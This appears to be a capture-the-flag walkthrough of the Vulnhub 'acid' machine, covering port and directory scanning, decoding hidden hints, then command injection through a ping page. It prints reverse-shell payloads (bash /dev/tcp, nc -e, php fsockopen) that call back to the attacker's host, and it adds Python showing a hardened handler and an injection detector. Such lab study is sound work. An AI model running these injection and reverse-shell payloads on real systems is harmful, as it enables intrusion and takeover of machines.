Vulnhub target: acid

Target download

Setup

Kali and the target both run in VMware, with the network adapter in bridged mode.

Information gathering

Check Kali's IP address and subnet

root@kaliattack:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:0c:29:75:0a:17 brd ff:ff:ff:ff:ff:ff
inet 192.168.1.4/24 brd 192.168.1.255 scope global dynamic noprefixroute eth0
valid_lft 76222sec preferred_lft 76222sec
inet6 fe80::20c:29ff:fe75:a17/64 scope link noprefixroute
valid_lft forever preferred_lft forever

Scan for the target

root@kaliattack:~# nmap -sP 192.168.1.4/24
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-19 12:54 CST
Nmap scan report for 192.168.1.1 (192.168.1.1)
Host is up (0.0024s latency).
MAC Address: B4:DE:DF:5D:FE:70 (zte)
Nmap scan report for 192.168.1.2 (192.168.1.2)
Host is up (0.0023s latency).
MAC Address: FC:7C:02:9C:00:59 (Phicomm (Shanghai))
Nmap scan report for laptop-lkst0l6r (192.168.1.3)
Host is up (0.000077s latency).
MAC Address: 00:0E:C6:BB:D2:3F (Asix Electronics)
Nmap scan report for acid (192.168.1.5)
Host is up (0.00030s latency).
MAC Address: 00:0C:29:83:5A:CF (VMware)
Nmap scan report for kaliattack (192.168.1.4)
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 1.97 seconds

The target is at 192.168.1.5; the physical host is at 192.168.1.3.

Scan all 65535 ports with service fingerprinting

root@kaliattack:~# nmap -p1-65535 -sV 192.168.1.5
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-20 10:34 CST
Nmap scan report for acid (192.168.1.5)
Host is up (0.0028s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE VERSION
33447/tcp open http Apache httpd 2.4.10 ((Ubuntu))
MAC Address: 00:0C:29:83:5A:CF (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.13 seconds

Port 33447 hosts a web service, Apache 2.4.10.

Brute-force directories

dirb http://192.168.1.5:33447

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Mon Jan 20 12:08:54 2020
URL_BASE: http://192.168.1.5:33447/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.1.5:33447/ ----
==> DIRECTORY: http://192.168.1.5:33447/css/
==> DIRECTORY: http://192.168.1.5:33447/images/
+ http://192.168.1.5:33447/index.html (CODE:200|SIZE:899)
+ http://192.168.1.5:33447/server-status (CODE:403|SIZE:302)

---- Entering directory: http://192.168.1.5:33447/css/ ----

---- Entering directory: http://192.168.1.5:33447/images/ ----
+ http://192.168.1.5:33447/images/Thumbs.db (CODE:200|SIZE:31744)

-----------------
END_TIME: Mon Jan 20 12:09:02 2020
DOWNLOADED: 13836 - FOUND: 3

Vulnerability discovery

Looking at the index page source, the last line holds a string of hexadecimal digits

<!--0x643239334c6d70775a773d3d-->

Convert it to a string

d293LmpwZw==

Base64-decode it

wow.jpg

Requesting wow.jpg gives a 404. Looking back at the directory scan, there is an images directory; images/wow.jpg shows "success". Save the image and open it; the last line contains

37:61:65:65:30:66:36:64:35:38:38:65:64:39:39:30:35:65:65:33:37:66:31:36:61:37:63:36:31:30:64:34

Convert it to a string

7aee0f6d588ed9905ee37f16a7c610d4

This looks like an MD5; cracking it gives 63425, which is probably a password, but there is nowhere to use it yet.

Switch to DirBuster and scan directories again (use the big wordlist). It finds a Challenge directory (the scan takes an hour or so), under which are cake.php, error.php, hacked.php, include.php and index.php, plus js, styles, css and less folders.

cake.php cannot be accessed directly, index requires an email and password to log in, and include.php has a file inclusion vulnerability, but there is no upload point.

Including cake.php reveals another mysterious string of digits

<!--0x5933566a4c6e4a34626e413d-->

Convert it to a string

Y3VjLnJ4bnA=

Base64-decode it

cuc.rxnp
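The decoding chain used for both HTML comments (hex in a comment, then base64) and for the colon-separated hex at the end of the image, as an added Python example that is not part of the original post. The sample values are the ones quoted on the page; the md5_matches helper is only a convenience for checking a cracked candidate against a digest.

```python
import base64
import hashlib
import re


def hex_comment_to_text(comment: str) -> str:
    """Pull the 0x... payload out of an HTML comment and decode the hex to text."""
    m = re.search(r"0x([0-9a-fA-F]+)", comment)
    if not m:
        raise ValueError("no 0x-prefixed hex payload in comment")
    return bytes.fromhex(m.group(1)).decode("ascii")


def decode_comment(comment: str) -> str:
    """Full chain from the post: hex comment -> base64 text -> plaintext."""
    b64 = hex_comment_to_text(comment)
    return base64.b64decode(b64, validate=True).decode("ascii")


def colon_hex_to_text(s: str) -> str:
    """Decode a 'xx:xx:xx' byte list, as found at the end of the image."""
    return bytes(int(part, 16) for part in s.strip().split(":")).decode("ascii")


def md5_matches(candidate: str, digest: str) -> bool:
    """Check whether a candidate string hashes to the given MD5 hex digest."""
    return hashlib.md5(candidate.encode()).hexdigest() == digest.lower()


if __name__ == "__main__":
    # Values copied from the page.
    print(decode_comment("<!--0x643239334c6d70775a773d3d-->"))  # wow.jpg
    print(decode_comment("<!--0x5933566a4c6e4a34626e413d-->"))  # cuc.rxnp
    tail = ("37:61:65:65:30:66:36:64:35:38:38:65:64:39:39:30:"
            "35:65:65:33:37:66:31:36:61:37:63:36:31:30:64:34")
    digest = colon_hex_to_text(tail)
    print(digest, md5_matches("63425", digest))
```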

But it is not clear what it is for.

Opening cake.php, the title shows /Magic_Box. Visiting it returns 403; another DirBuster round turns up low.php, command.php and tails.php.

low is an empty page, command has command execution, and tails asks for a secretkey; neither 63425 nor cuc.rxnp works there.

Entering 192.168.1.4;ls into command's execution field returns

PING 192.168.1.4 (192.168.1.4) 56(84) bytes of data.
64 bytes from 192.168.1.4: icmp_seq=1 ttl=64 time=0.356 ms
64 bytes from 192.168.1.4: icmp_seq=2 ttl=64 time=0.297 ms
64 bytes from 192.168.1.4: icmp_seq=3 ttl=64 time=0.352 ms

--- 192.168.1.4 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 1998ms
rtt min/avg/max/mdev = 0.297/0.335/0.356/0.026 ms
command.php
command.php.save
command2.php.save
command2.php.save.1
low.php
proc
tails.php

Command execution confirmed.
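The page does not show command.php's source, so the following is a hypothetical reconstruction in Python, added here and not from the original post: the unsafe way a ping page ends up running ";ls", beside a hardened handler that only accepts a literal IP address and never goes through a shell, plus a small log-review check for metacharacters.

```python
import ipaddress
import subprocess

SHELL_METACHARS = ";|&`$()<>\n"


def vulnerable_ping_cmdline(user_input: str) -> str:
    """The unsafe pattern: user input pasted into a shell command line.
    With '192.168.1.4;ls' the shell runs ping, then ls (as seen on the page)."""
    return f"ping -c 3 {user_input}"


def parse_target(user_input: str) -> str:
    """Accept only a literal IPv4/IPv6 address; anything else is rejected."""
    try:
        return str(ipaddress.ip_address(user_input.strip()))
    except ValueError as exc:
        raise ValueError(f"not an IP address: {user_input!r}") from exc


def is_valid_target(user_input: str) -> bool:
    try:
        parse_target(user_input)
        return True
    except ValueError:
        return False


def safe_ping_argv(user_input: str) -> list:
    """argv list for subprocess.run without a shell: no metacharacter is interpreted."""
    return ["ping", "-c", "3", parse_target(user_input)]


def safe_ping(user_input: str) -> subprocess.CompletedProcess:
    return subprocess.run(safe_ping_argv(user_input), capture_output=True,
                          text=True, timeout=15)


def looks_injected(user_input: str) -> bool:
    """Detection helper for reviewing request logs: flag inputs carrying shell syntax."""
    return any(ch in user_input for ch in SHELL_METACHARS)


if __name__ == "__main__":
    sample = "192.168.1.4;ls"          # the input used on the page
    print(vulnerable_ping_cmdline(sample))
    print(is_valid_target(sample), looks_injected(sample))
    print(safe_ping_argv("192.168.1.4"))
```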

Exploitation

Reverse shell: first listen on a port on Kali

nc -lvvp 4444

Use the command execution to get a reverse shell; URL-encode 192.168.1.4;bash -i >& /dev/tcp/192.168.1.4/4444 0>&1

%31%39%32%2E%31%36%38%2E%31%2E%34%3B%62%61%73%68%20%2D%69%20%3E%26%20%2F%64%65%76%2F%74%63%70%2F%31%39%32%2E%31%36%38%2E%36%34%2E%31%2F%34%34%34%34%20%30%3E%26%31

Nothing received. Try nc instead: 192.168.1.4;nc -e /bin/bash -d 192.168.1.4 4444

%31%39%32%2E%31%36%38%2E%31%2E%34%3B%6E%63%20%2D%65%20%2F%62%69%6E%2F%62%61%73%68%20%20%2D%64%20%31%39%32%2E%31%36%38%2E%31%2E%34%20%34%34%34%34

Still nothing. Try php: 192.168.1.4;php -r '$sock=fsockopen("192.168.1.4",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

%31%39%32%2e%31%36%38%2e%31%2e%34%3b%70%68%70%20%2d%72%20%27%24%73%6f%63%6b%3d%66%73%6f%63%6b%6f%70%65%6e%28%22%31%39%32%2e%31%36%38%2e%31%2e%34%22%2c%34%34%34%34%29%3b%65%78%65%63%28%22%2f%62%69%6e%2f%73%68%20%2d%69%20%3c%26%33%20%3e%26%33%20%32%3e%26%33%22%29%3b%27

The reverse shell connects successfully.

Gathering information

Running su gives "must be run from a terminal". Use Python to spawn a local interactive shell

echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py

Now su can be run.

cat /etc/passwd reveals an acid user. find / -user acid 2>/dev/null (errors suppressed) lists the files owned by acid and turns up /sbin/raw_vs_isi/hint.pcapng; download it to take a look

scp /sbin/raw_vs_isi/hint.pcapng root@192.168.1.4:/root/

Inspecting the capture reveals "saman and nowadays he's known as 1337hax0rsu saman", so the password is 1337hax0r. The same password logs in as root, which yields the flag.

Reference: an article on Anquanke (安全客)

Author: lll

Published: 2020-01-19

Updated: 2022-09-19
